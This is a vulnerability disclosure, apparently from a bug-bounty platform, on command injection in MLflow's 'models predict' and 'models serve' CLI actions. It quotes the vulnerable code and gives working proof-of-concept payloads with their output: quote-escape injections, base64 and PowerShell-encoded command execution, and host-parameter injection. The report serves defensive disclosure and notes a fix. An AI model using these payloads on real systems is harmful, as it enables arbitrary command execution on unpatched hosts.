Multiple command injections in `mlflow models` CLI action in mlflow/mlflow
Reported on
Apr 30th 2023
Description
The mlflow
cli executable is vulnerable to a command injection attack in mlflow models predict
and mlflow models serve
actions. The aforementioned actions is defined in file mlflow\models\cli.py
, and uses a vulnerable predict
and serve
methods of a dynamically resolved instance of PyFuncBackend
class, from a mlflow\pyfunc\backend.py
file.
[Bug 1] mlflow models predict
command injection
The code of the PyFuncBackend.predict
method can be seen below:
def predict(self, model_uri, input_path, output_path, content_type):
"""
Generate predictions using generic python model saved with MLflow. The expected format of
the input JSON is the Mlflow scoring format.
Return the prediction results as a JSON.
"""
local_path = _download_artifact_from_uri(model_uri)
# NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
# platform compatibility.
local_uri = path_to_local_file_uri(local_path)
if self._env_manager != _EnvManager.LOCAL:
command = (
'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
"model_uri={model_uri}, "
"input_path={input_path}, "
"output_path={output_path}, "
"content_type={content_type})"
'"'
).format(
model_uri=repr(local_uri),
input_path=repr(input_path),
output_path=repr(output_path),
content_type=repr(content_type),
)
return self.prepare_env(local_path).execute(command)
else:
scoring_server._predict(local_uri, input_path, output_path, content_type)
The application dynamically constructs a CMD command by injecting the user input into the predefined placeholders, and passes it to the the mlflow.utils.Environment.execute
method, which essentially runs the newly created console command.
The application uses built-in python function repr
to add quotes around the user input. Nonetheless, repr
will not prevent the attacker from injecting a double quote into the CLI parameters to escape from the python -c ""
parameter, as can be seen from the below example:
>>> local_uri='LOCAL_URI'
>>> input_path='INPUT_PATH'
>>> output_path='OUTPUT_PATH'
>>> content_type='injection poc"; we are free now; echo "escape the rest'
>>> command = (
... 'python -c "from mlflow.pyfunc.scoring_server import _predict; _predict('
... "model_uri={model_uri}, "
... "input_path={input_path}, "
... "output_path={output_path}, "
... "content_type={content_type})"
... '"'
... ).format(
... model_uri=repr(local_uri),
... input_path=repr(input_path),
... output_path=repr(output_path),
... content_type=repr(content_type),
... )
>>> print(command)
python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='LOCAL_URI', input_path='INPUT_PATH', output_path='OUTPUT_PATH', content_type='injection poc"; we are free now; echo "escape the rest')"
Thus, it is possible to inject arbitrary commands into the parameters of the mlflow models predict
function to obtain an unintended code execution.
[Bug 2] mlflow models serve
command injection
The code of vulnerable PyFuncBackend.serve
method can be seen below.
def serve(
self,
model_uri,
port,
host,
timeout,
enable_mlserver,
synchronous=True,
stdout=None,
stderr=None,
): # pylint: disable=W0221
"""
Serve pyfunc model locally.
"""
local_path = _download_artifact_from_uri(model_uri)
server_implementation = mlserver if enable_mlserver else scoring_server
command, command_env = server_implementation.get_cmd(
local_path, port, host, timeout, self._nworkers
)
...
if self._env_manager != _EnvManager.LOCAL:
return self.prepare_env(local_path).execute(
command,
command_env,
stdout=stdout,
stderr=stderr,
preexec_fn=setup_sigterm_on_parent_death,
synchronous=synchronous,
)
else:
_logger.info("=== Running command '%s'", command)
if os.name != "nt":
command = ["bash", "-c", command]
child_proc = subprocess.Popen(
command,
env=command_env,
preexec_fn=setup_sigterm_on_parent_death,
stdout=stdout,
stderr=stderr,
)
...
The above uses get_cmd
function, defined in mlflow/pyfunc/scoring_server/__init__.py
that directly formats user input into a command string:
def get_cmd(
model_uri: str, port: int = None, host: int = None, timeout: int = None, nworkers: int = None
) -> Tuple[str, Dict[str, str]]:
local_uri = path_to_local_file_uri(model_uri)
timeout = timeout or MLFLOW_SCORING_SERVER_REQUEST_TIMEOUT.get()
# NB: Absolute windows paths do not work with mlflow apis, use file uri to ensure
# platform compatibility.
if os.name != "nt":
args = [f"--timeout={timeout}"]
if port and host:
args.append(f"-b {host}:{port}")
elif host:
args.append(f"-b {host}")
if nworkers:
args.append(f"-w {nworkers}")
command = (
f"gunicorn {' '.join(args)} ${{GUNICORN_CMD_ARGS}}"
" -- mlflow.pyfunc.scoring_server.wsgi:app"
)
else:
args = []
if host:
args.append(f"--host={host}")
if port:
args.append(f"--port={port}")
command = (
f"waitress-serve {' '.join(args)} "
"--ident=mlflow mlflow.pyfunc.scoring_server.wsgi:app"
)
command_env = os.environ.copy()
command_env[_SERVER_MODEL_PATH] = local_uri
return command, command_env
Proof of Concept
Install required dependencies
Install the latest version of mlflow
pip install mlflow
Install pyenv
or conda
(prerequisites to get mlflow models predict
command to work with non local environments.
OR
Setup mlflow environment
Clone the mlflow repository into a local directory
git clone https://github.com/mlflow/mlflow
Run one of the example mlflow scripts that save a model, e.g. examples/sklearn_logistic_regression/train.py
to populate the mlruns
directory:
cd mlflow/examples/sklearn_logistic_regression
python train.py
List files inside mlruns/0/
directory to get a valid run ID
ls -l mlruns/0/
total 8
drwxrwxr-x 6 ubuntu ubuntu 4096 Apr 29 19:28 330068e1dfcf43cb8f1cd0e86038d781 # use this id
-rw-rw-r-- 1 ubuntu ubuntu 227 Apr 29 19:28 meta.yaml
[Bug 1] Exploitation
Insert the below payload into input path (-i
), output path (-o
), or type (-t
) parameters:
"; YOUR COMMAND HERE; echo "
For example:
mlflow models predict -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -i 'test"; id; echo "' -o test
2023/04/29 19:48:00 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 19:48:00 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 19:48:00 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; id; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
If you want to perform some advanced commands that require use of any quotes, you may want to encode your input beforehand.
Injecting advanced payloads for Linux & virtualenv env manager:
# example of encoding a payload to echo "hello from mlflow rce" & run the "id" --env-manager virtualenv
echo 'echo "hello from mlflow rce!"; id;' | base64
# encoded payload
ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo=
# poc
$ mlflow models predict -m 'runs:/RUN_ID/model/' -i 'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "' -o test
2023/04/29 20:09:37 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/29 20:09:37 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/29 20:09:37 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model\', input_path=\'test"; echo ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlISI7IGlkOwo= | base64 -d | bash; echo "\', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri='file:///home/ubuntu/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/330068e1dfcf43cb8f1cd0e86038d781/artifacts/model', input_path='test
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce!
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
', output_path='test', content_type='json')
Injecting advanced payloads for for Windows & conda env manager:
# example of encoding a payload to echo "hello from mlflow rce" & run the "whoami /all"
https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-16LE%20(1200)')To_Base64('A-Za-z0-9%2B/%3D')&input=ZWNobyAiaGVsbG8gZnJvbSBtbGZsb3cgcmNlIjsgd2hvYW1pIC9hbGw
# encoded payload
ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA==
# poc
(base) C:\Temp\mlflow\examples\sklearn_logistic_regression>mlflow models predict --env-manager conda -m mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model -i "test"" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo "" " -o test -t json
C:\Users\Strawberry\miniconda3\lib\site-packages\click\core.py:2322: UserWarning: Use of conda is discouraged. If you use it, please ensure that your use of conda complies with Anaconda's terms of service (https://legal.anaconda.com/policies/en/?name=terms-of-service). virtualenv is the recommended tool for environment reproducibility. To suppress this warning, set the MLFLOW_DISABLE_ENV_MANAGER_CONDA_WARNING (default: False, type: bool) environment variable to 'TRUE'.
value = self.callback(ctx, self, value)
2023/04/30 02:32:40 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 02:32:43 INFO mlflow.utils.conda: Conda environment mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e already exists.
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c ""']'
2023/04/30 02:32:43 INFO mlflow.utils.environment: === Running command '['cmd', '/c', 'conda activate mlflow-a90f7522e7a3d8452e89ff3700e8e21d677beb9e & python -c "from mlflow.pyfunc.scoring_server import _predict; _predict(model_uri=\'file:///C:/Users/Strawberry/Desktop/projects/mlflow/examples/sklearn_logistic_regression/mlruns/0/ef785deed8c04b41b88369d777cf1bf8/artifacts/model\', input_path=\'test" & powershell -ec ZQBjAGgAbwAgACIAaABlAGwAbABvACAAZgByAG8AbQAgAG0AbABmAGwAbwB3ACAAcgBjAGUAIgA7ACAAdwBoAG8AYQBtAGkAIAAvAGEAbABsAA== & echo " \', output_path=\'test\', content_type=\'json\')"']'
File "<string>", line 1
"from
^
SyntaxError: unterminated string literal (detected at line 1)
hello from mlflow rce
USER INFORMATION
----------------
User Name SID
========================== =============================================
desktop-0gd1eqg\strawberry S-1-5-21-2872549777-3506415077-326829181-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
DESKTOP-0GD1EQG\docker-users Alias S-1-5-21-2872549777-3506415077-326829181-1005 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Hyper-V Administrators Alias S-1-5-32-578 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
\" ', output_path='test', content_type='json')\"
[Bug 2] Exploitation
Insert the command injection payload into the -h
(--host
) parameter:
mlflow models serve -m 'runs:/330068e1dfcf43cb8f1cd0e86038d781/model/' -p '80' -h 'localhost & id & localhost'
2023/04/30 11:51:07 INFO mlflow.models.flavor_backend_registry: Selected backend for flavor 'python_function'
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Installing python 3.10.6 if it does not exist
2023/04/30 11:51:07 INFO mlflow.utils.virtualenv: Environment /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b already exists
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && python -c ""']'
2023/04/30 11:51:07 INFO mlflow.utils.environment: === Running command '['bash', '-c', 'source /home/ubuntu/.mlflow/envs/mlflow-ddb80e0d83ed2efe0135e5c6dbae17ed032c869b/bin/activate && exec gunicorn --timeout=60 -b localhost & id & localhost:80 -w 1 ${GUNICORN_CMD_ARGS} -- mlflow.pyfunc.scoring_server.wsgi:app']'
...
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),135(lxd),136(sambashare)
...
Impact
An attacker is able to execute arbitrary OS commands by injecting malicious input into the CLI arguments of the models predict
action of a mlflow
executable. This vulnerability can be leveraged to get a foothold on a vulnerable machine, or attempt a local privilege escalation if a limited way of executing mlflow
executable is obtained.
Occurrences
backend.py L162
Code of the vulnerable PyFuncBackend.serve
method
backend.py L133
The code of a vulnerable PyFuncBackend.predict
method
Upon further investigation, it seems that numerous methods of PyFuncBackend, and RFuncBackend classes are vulnerable to similar command injections. I will try to write them up asap & group them up in the report here
Updated the description to include the second discovered command injection in PyFuncBackend
. RFuncBackend
is still in progress
@admin, can we add a co-author to this report? https://huntr.dev/users/nashkersk/
Also, this vulnerability was fixed in https://github.com/mlflow/mlflow/pull/9053 by @serena-ruan